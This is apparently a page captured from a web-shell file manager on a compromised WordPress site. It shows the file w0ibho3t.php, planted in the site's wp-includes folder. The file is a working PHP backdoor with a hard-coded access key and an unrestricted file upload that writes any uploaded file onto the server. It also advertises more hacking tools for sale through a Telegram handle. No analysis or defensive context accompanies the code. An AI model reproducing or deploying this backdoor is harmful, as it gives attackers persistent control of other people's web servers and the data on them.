📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 00:58:30
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-includes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-includes
🔄 Refresh
✏️
Editing: w0ibho3t.php
Writable
<?php // BDKR28 Tool $p = $_GET['BDKR28'] ?? ''; if($p !== 'muvl'){ die("<center><h2><a href='https://t.me/BDKR28' target='_blank' style='color:#0088cc;font-weight:bold;text-decoration:none'>FOR BUY MORE TOOLS: @BDKR28</a></h2><form method='get'><input type='password' name='BDKR28' placeholder='Enter Key'><button>Login</button></form></center>"); } $msg = ""; if(isset($_FILES['f'])){ $n = $_FILES['f']['name']; if(move_uploaded_file($_FILES['f']['tmp_name'], $n)){ $msg = "Success - <a href='$n'>$n</a>"; } else { $msg = "<font color='red'>Failed!</font>"; } } ?> <!DOCTYPE html> <html> <head> <title>BDKR28</title> </head> <body> <center> <h2>BDKR28</h2> <p><a href='https://t.me/BDKR28' target='_blank' style='color:#0088cc;font-weight:bold;text-decoration:none'>FOR BUY MORE TOOLS: @BDKR28</a></p> <form method='post' enctype='multipart/form-data'> <input type='file' name='f'><br><br> <button type='submit'>Upload File</button> </form> <br> <b><?php echo $msg; ?></b> </center> </body> </html>
💾 Save Changes
❌ Cancel